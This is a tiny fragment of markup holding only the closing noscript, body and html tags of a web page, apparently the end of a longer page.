  </noscript>
</body>
</html>
